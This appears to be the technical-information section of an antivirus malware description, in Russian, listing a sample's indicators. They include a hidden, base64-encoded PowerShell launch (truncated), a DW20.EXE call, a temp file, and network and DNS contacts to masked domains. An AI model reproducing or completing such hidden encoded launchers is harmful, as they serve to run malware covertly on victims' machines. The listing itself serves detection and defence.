Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABFAGEAcQBlAGsAcQBkAHIAPQAnAFIAZABpAGgAeQBoAG8AawByACcAOwAkAFEAbABpAGQAcwB2AG0AZwB4ACAAPQAgACcANgA5ADcAJwA7ACQAWgBlAGsAcABpAHcAYQBmAGkAZwB5AHcAPQAnAEIAegBuAHA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1464
- %TEMP%\722284.cvr
- 'he##k.com':443
- 'he##k.com':443
- DNS ASK ar##jbd.com
- DNS ASK he##k.com
- DNS ASK ic####graphics.com
- DNS ASK bu#####istadvtours.com
- DNS ASK na####school.com